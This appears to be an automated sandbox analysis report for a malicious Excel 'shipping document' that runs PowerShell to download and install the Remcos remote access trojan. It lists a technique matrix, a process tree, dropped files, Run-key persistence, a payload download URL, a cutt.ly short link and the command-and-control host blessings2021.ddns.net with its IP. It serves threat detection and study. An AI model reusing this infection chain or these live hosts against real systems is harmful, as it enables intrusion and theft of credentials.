                Domain Accounts | Exploitation for Client Execution 13 | Scheduled Task/Job 1 | Windows Service 1 | Scripting 421 | Credentials In Files 2 | System Service Discovery 1 | SMB/Windows Admin Shares | Clipboard Data 2 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | Command and Scripting Interpreter 113 | Registry Run Keys / Startup Folder 1 | Process Injection 221 | Obfuscated Files or Information 41 | NTDS | File and Directory Discovery 4 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap | | Carrier Billing Fraud
                Cloud Accounts | Scheduled Task/Job 1 | Network Logon Script | Scheduled Task/Job 1 | Software Packing 12 | LSA Secrets | System Information Discovery 44 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 2 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | Service Execution 2 | Rc.common | Registry Run Keys / Startup Folder 1 | Masquerading 11 | Cached Domain Credentials | Query Registry 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 13 | Jamming or Denial of Service | | Abuse Accessibility Features
                External Remote Services | PowerShell 3 | Startup Items | Startup Items | Virtualization/Sandbox Evasion 2 | DCSync | Security Software Discovery 11 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 1 | Proc Filesystem | Virtualization/Sandbox Evasion 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 221 | /etc/passwd and /etc/shadow | Process Discovery 2 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
                Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | Remote System Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop

                Behavior Graph

                Legend (the graph icons are not reproduced in this text rendering): node types are Process, Signature, Created File and DNS/IP Info; process flags are Is Dropped, Is Windows Process and Is malicious; each process node carries the number of created registry values and the number of created files; the language badge is one of Visual Basic, Delphi, Java, .Net C# or VB.NET, or C, C++ or other language; Internet marks external connections.

                Behavior Graph ID: 336456 | Sample: Shipping Document PLBL003534.xls | Startdate: 06/01/2021 | Architecture: WINDOWS | Score: 100

                Sample-level signatures (graph node 2): Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 15 other signatures

                Process tree as drawn in the graph (numeric prefixes are the graph node ids; bracketed numbers are the per-process counters drawn next to a node, i.e. created registry values / created files):

                2 Shipping Document PLBL003534.xls
                  13 EXCEL.EXE [83 29]
                     signatures: Obfuscated command line found; Document exploit detected (process start blacklist hit)
                     20 cmd.exe
                        signatures: Wscript starts Powershell (via cmd or directly); Obfuscated command line found
                        35 powershell.exe [7]
                           44 sm.exe [3]
                              dropped: C:\Users\user\AppData\...\kXLgfvFKbJs.exe (PE32); C:\Users\user\AppData\Local\...\tmpC5CF.tmp (XML)
                              signatures: Contains functionality to steal Chrome passwords or cookies; Contains functionality to capture and log keystrokes; Contains functionality to inject code into remote processes; 3 other signatures
                              48 sm.exe [1 4]
                                 dropped: C:\Users\user\AppData\Roaming\...\remcos.exe (PE32)
                                 57 wscript.exe [1]
                                    signatures: Wscript starts Powershell (via cmd or directly)
                                    60 cmd.exe
                                       62 remcos.exe [2]
                                          signatures: Multi AV Scanner detection for dropped file; Contains functionality to steal Chrome passwords or cookies; Contains functionality to capture and log keystrokes; 2 other signatures
                                          65 remcos.exe
                                             network: blessings2021.ddns.net 185.244.30.19, remote port 2021, local ports 49170 and 49171, DAVID_CRAIGGG, Netherlands
                                          68 schtasks.exe
                                          70 remcos.exe
                              51 schtasks.exe
                              53 sm.exe
                              55 2 other processes
                     23 cmd.exe
                        37 powershell.exe [16 9]
                           network: bighoreca.nl 83.172.144.37, remote port 80, local port 49169, NEDZONE-ASNL, Netherlands; cutt.ly 104.22.1.232, remote port 443, local port 49167, CLOUDFLARENETUS, United States
                           dropped: C:\Users\user\Documents\sm.exe (PE32)
                           signatures: Drops PE files to the document folder of the user; Drops PE files with benign system names; Powershell drops PE file
                     25 cmd.exe
                        42 powershell.exe [7]
                  16 remcos.exe
                     signatures: Injects a PE file into a foreign processes
                     27 schtasks.exe
                     29 remcos.exe
                     31 remcos.exe
                     33 remcos.exe
                  18 remcos.exe

                Screenshots


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Roaming\Remcos\remcos.exe | 13% | ReversingLabs | Win32.Trojan.Generic
                C:\Users\user\AppData\Roaming\kXLgfvFKbJs.exe | 13% | ReversingLabs | Win32.Trojan.Generic
                C:\Users\user\Documents\sm.exe | 13% | ReversingLabs | Win32.Trojan.Generic

                Unpacked PE Files

                Source | Detection | Scanner | Label
                18.2.sm.exe.400000.1.unpack | 100% | Avira | BDS/Backdoor.Gen
                34.2.remcos.exe.400000.1.unpack | 100% | Avira | BDS/Backdoor.Gen
                27.2.remcos.exe.400000.1.unpack | 100% | Avira | BDS/Backdoor.Gen

                Domains

                Source | Detection | Scanner
                cutt.ly | 0% | Virustotal
                blessings2021.ddns.net | 0% | Virustotal
                bighoreca.nl | 2% | Virustotal

                URLs

                Each URL below was reported several times (once per memory dump or process in which it was found); the repeats are collapsed here. Almost all of them are CRL, OCSP and CPS addresses of certificate authorities, i.e. strings from embedded certificate data, and all are rated safe. The one entry that matters for this sample is https://cutt.ly/mjfU5y0, the first-stage download location in the first PowerShell command line. Trailing characters such as 0, 0E, 0$, 0V, 0= and PE are part of the raw strings as extracted from memory and are left as found.

                Source | Detection | Scanner | Label
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | 0% | URL Reputation | safe
                http://www.a-cert.at0E | 0% | URL Reputation | safe
                http://www.certplus.com/CRL/class3.crl0 | 0% | URL Reputation | safe
                http://www.e-me.lv/repository0 | 0% | URL Reputation | safe
                http://www.acabogacia.org/doc0 | 0% | URL Reputation | safe
                http://crl.chambersign.org/chambersroot.crl0 | 0% | URL Reputation | safe
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0 | 0% | URL Reputation | safe
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0 | 0% | URL Reputation | safe
                http://www.certifikat.dk/repository0 | 0% | URL Reputation | safe
                http://www.chambersign.org1 | 0% | URL Reputation | safe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
                http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
                http://www.pkioverheid.nl/policies/root-policy0 | 0% | URL Reputation | safe
                http://crl.ssc.lt/root-c/cacrl.crl0 | 0% | URL Reputation | safe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0 | 0% | URL Reputation | safe
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl | 0% | URL Reputation | safe
                http://ca.disig.sk/ca/crl/ca_disig.crl0 | 0% | URL Reputation | safe
                http://www.certplus.com/CRL/class3P.crl0 | 0% | URL Reputation | safe
                http://repository.infonotary.com/cps/qcps.html0$ | 0% | URL Reputation | safe
                http://www.post.trust.ie/reposit/cps.html0 | 0% | URL Reputation | safe
                https://cutt.ly/mjfU5y0PE | 0% | Avira URL Cloud | safe
                http://www.certplus.com/CRL/class2.crl0 | 0% | URL Reputation | safe
                http://www.disig.sk/ca/crl/ca_disig.crl0 | 0% | URL Reputation | safe
                http://ocsp.infonotary.com/responder.cgi0V | 0% | URL Reputation | safe
                http://www.sk.ee/cps/0 | 0% | URL Reputation | safe
                http://www.certicamara.com0 | 0% | Avira URL Cloud | safe
                http://www.globaltrust.info0= | 0% | Avira URL Cloud | safe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E | 0% | URL Reputation | safe

                Domains and IPs

                Contacted Domains

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                cutt.ly | 104.22.1.232 | true | true | - | unknown
                blessings2021.ddns.net | 185.244.30.19 | true | true | - | unknown
                bighoreca.nl | 83.172.144.37 | true | true | - | unknown

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://bighoreca.nl/wp-content/themes/index/Shipppy.exe | true | Avira URL Cloud: safe | unknown

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | powershell.exe, 00000007.00000002.2119346499.00000000003BE000.00000004.00000020.sdmp | false | 4× URL Reputation: safe | unknown
                http://www.a-cert.at0E | powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://www.certplus.com/CRL/class3.crl0 | powershell.exe, 00000007.00000002.2126431477.000000001B8FB000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://www.e-me.lv/repository0 | powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://www.acabogacia.org/doc0 | powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://crl.chambersign.org/chambersroot.crl0 | powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0 | powershell.exe, 00000007.00000002.2119396182.000000000041C000.00000004.00000020.sdmp | false | - | high
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0 | powershell.exe, 00000007.00000002.2126431477.000000001B8FB000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0 | powershell.exe, 00000007.00000002.2128313611.000000001D06F000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://www.certifikat.dk/repository0 | powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://www.chambersign.org1 | powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 00000007.00000002.2126198847.000000001B874000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://www.pkioverheid.nl/policies/root-policy0 | powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://repository.swisssign.com/0 | powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmp | false | - | high
                http://crl.ssc.lt/root-c/cacrl.crl0 | powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0 | powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl | powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://ca.disig.sk/ca/crl/ca_disig.crl0 | powershell.exe, 00000007.00000002.2128269583.000000001D020000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://www.certplus.com/CRL/class3P.crl0 | powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://repository.infonotary.com/cps/qcps.html0$ | powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://www.post.trust.ie/reposit/cps.html0 | powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                https://cutt.ly/mjfU5y0PE | powershell.exe, 00000007.00000002.2123090513.00000000035BE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.certplus.com/CRL/class2.crl0 | powershell.exe, 00000007.00000002.2128354221.000000001D0C7000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://www.disig.sk/ca/crl/ca_disig.crl0 | powershell.exe, 00000007.00000002.2128269583.000000001D020000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://ocsp.infonotary.com/responder.cgi0V | powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://www.sk.ee/cps/0 | powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://www.certicamara.com0 | powershell.exe, 00000007.00000003.2116814482.000000001D020000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.globaltrust.info0= | powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E | powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmp | false | 4× URL Reputation: safe | unknown
                http://servername/isapibackend.dll | powershell.exe, 00000007.00000002.2128403252.000000001D3B0000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
                http://www.valicert.1 | powershell.exe, 00000007.00000002.2126198847.000000001B874000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
                http://www.ssc.lt/cps03 | powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.windows.com/pctv. | powershell.exe, 00000007.00000002.2127799800.000000001CC00000.00000002.00000001.sdmp | false | - | high
                http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0= | powershell.exe, 00000007.00000002.2128313611.000000001D06F000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://ocsp.pki.gva.es0 | powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://crl.oces.certifikat.dk/oces.crl0 | powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://crl.ssc.lt/root-b/cacrl.crl0 | powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.certicamara.com/dpc/0Z | powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmp | false | - | high
                http://crl.pki.wellsfargo.com/wsprca.crl0 | powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmp | false | - | high
                http://www.dnie.es/dpc0 | powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.rootca.or.kr/rca/cps.html0 | powershell.exe, 00000007.00000002.2126547382.000000001B92B000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.trustcenter.de/guidelines0 | powershell.exe, 00000007.00000002.2119346499.00000000003BE000.00000004.00000020.sdmp | false | 3× URL Reputation: safe | unknown
                http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0 | powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true | powershell.exe, 00000007.00000002.2128046184.000000001CDE7000.00000002.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.globaltrust.info0 | powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://certificates.starfieldtech.com/repository/1604 | powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmp | false | - | high
                http://www.certplus.com/CRL/class3TS.crl0 | powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.entrust.net/CRL/Client1.crl0 | powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmp | false | - | high
                http://www.entrust.net/CRL/net1.crl0 | powershell.exe, 00000007.00000003.2116822019.000000001D033000.00000004.00000001.sdmp | false | - | high
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000007.00000002.2120085059.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2156941353.00000000023B0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2176488120.0000000002350000.00000002.00000001.sdmp | false | - | high
                https://www.catcert.net/verarrel | powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.disig.sk/ca0f | powershell.exe, 00000007.00000002.2128269583.000000001D020000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000009.00000002.2156295854.000000000029E000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2175630207.00000000001AE000.00000004.00000020.sdmp | false | - | high
                http://www.e-szigno.hu/RootCA.crl | powershell.exe, 00000007.00000002.2128219101.000000001CFE0000.00000004.00000001.sdmp | false | - | high
                http://www.signatur.rtr.at/current.crl0 | powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmp | false | - | high
                http://www.sk.ee/juur/crl/0 | powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://crl.chambersign.org/chambersignroot.crl0 | powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://crl.xrampsecurity.com/XGCA.crl0 | powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.quovadis.bm0 | powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://crl.ssc.lt/root-a/cacrl.crl0 | powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.trustdst.com/certificates/policy/ACES-index.html0 | powershell.exe, 00000007.00000002.2128269583.000000001D020000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.firmaprofesional.com0 | powershell.exe, 00000007.00000002.2119346499.00000000003BE000.00000004.00000020.sdmp | false | 3× URL Reputation: safe | unknown
                https://cutt.ly/ | powershell.exe, 00000007.00000002.2123090513.00000000035BE000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
                https://www.netlock.net/docs | powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl | powershell.exe, 00000007.00000003.2116860749.000000001CFF1000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://crl.entrust.net/2048ca.crl0 | powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmp | false | - | high
                http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0 | powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmp | false | - | high
                http://cps.chambersign.org/cps/publicnotaryroot.html0 | powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.e-trust.be/CPS/QNcerts | powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.certicamara.com/certicamaraca.crl0 | powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmp | false | - | high
                http://www.msnbc.com/news/ticker.txt | powershell.exe, 00000007.00000002.2127799800.000000001CC00000.00000002.00000001.sdmp | false | - | high
                http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0 | powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://fedir.comsign.co.il/crl/ComSignCA.crl0 | powershell.exe, 00000007.00000002.2126514479.000000001B925000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0 | powershell.exe, 00000007.00000002.2128269583.000000001D020000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://ocsp.entrust.net03 | powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://cps.chambersign.org/cps/chambersroot.html0 | powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.acabogacia.org0 | powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.valicert. | powershell.exe, 00000007.00000002.2126198847.000000001B874000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                https://cutt.ly | powershell.exe, 00000007.00000002.2123090513.00000000035BE000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
                https://ca.sia.it/seccli/repository/CPS0 | powershell.exe, 00000007.00000002.2126041988.000000001B830000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://crl.securetrust.com/SGCA.crl0 | powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0 | powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://crl.securetrust.com/STCA.crl0 | powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0 | powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.icra.org/vocabulary/. | powershell.exe, 00000007.00000002.2128046184.000000001CDE7000.00000002.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.certicamara.com/certicamaraca.crl0; | powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmp | false | - | high
                http://www.e-szigno.hu/RootCA.crt0 | powershell.exe, 00000007.00000002.2128219101.000000001CFE0000.00000004.00000001.sdmp | false | - | high
                http://www.quovadisglobal.com/cps0 | powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmp | false | - | high
                http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0L | powershell.exe, 00000007.00000002.2119396182.000000000041C000.00000004.00000020.sdmp | false | - | high
                http://investor.msn.com/ | powershell.exe, 00000007.00000002.2127799800.000000001CC00000.00000002.00000001.sdmp | false | - | high
                http://www.valicert.com/1 | powershell.exe, 00000007.00000002.2126198847.000000001B874000.00000004.00000001.sdmp | false | 3× URL Reputation: safe | unknown
                http://www.e-szigno.hu/SZSZ/0 | powershell.exe, 00000007.00000002.2128219101.000000001CFE0000.00000004.00000001.sdmp | false | - | high
                http://www.%s.comPA | powershell.exe, 00000007.00000002.2120085059.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2156941353.00000000023B0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2176488120.0000000002350000.00000002.00000001.sdmp | false | 3× URL Reputation: safe | low
                http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0 | powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmp | false
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://ocsp.quovadisoffshore.com0powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://ocsp.entrust.net0Dpowershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://cps.chambersign.org/cps/chambersignroot.html0powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://ca.sia.it/secsrv/repository/CRL.der0Jpowershell.exe, 00000007.00000002.2126431477.000000001B8FB000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown

                                                            Contacted IPs


                                                            Public

IP            | Domain  | Country       | ASN    | ASN Name        | Malicious
185.244.30.19 | unknown | Netherlands   | 209623 | DAVID_CRAIGGG   | true
83.172.144.37 | unknown | Netherlands   | 25459  | NEDZONE-ASNL    | true
104.22.1.232  | unknown | United States | 13335  | CLOUDFLARENETUS | true

                                                            General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 336456
Start date: 06.01.2021
Start time: 07:45:14
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 46s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Shipping Document PLBL003534.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 35
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winXLS@47/20@27/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 45.5% (good quality ratio 28.9%)
• Quality average: 47.1%
• Quality standard deviation: 42.1%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Changed system and user locale, location and keyboard layout to English - United States
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209, 67.27.233.254, 8.253.204.120, 67.27.157.126, 67.27.159.254, 67.27.159.126
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

Time     | Type            | Description
07:45:52 | API Interceptor | 448x Sleep call for process: powershell.exe modified
07:46:20 | API Interceptor | 99x Sleep call for process: sm.exe modified
07:46:29 | API Interceptor | 3x Sleep call for process: schtasks.exe modified
07:46:32 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Remcos "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
07:46:33 | API Interceptor | 20x Sleep call for process: wscript.exe modified
07:46:36 | API Interceptor | 1270x Sleep call for process: remcos.exe modified
07:46:41 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Remcos "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"

                                                            Joe Sandbox View / Context

                                                            IPs

Match         | Associated Sample Name / URL                  | Detection | Context
185.244.30.19 | Orden CW62175Q, pdf.exe                       | malicious |
              | Orden CW62125Q, pdf.exe                       | malicious |
              | Orden CW62125Q, pdf.exe                       | malicious |
              | 20200330JU30181529080,pdf.exe                 | malicious |
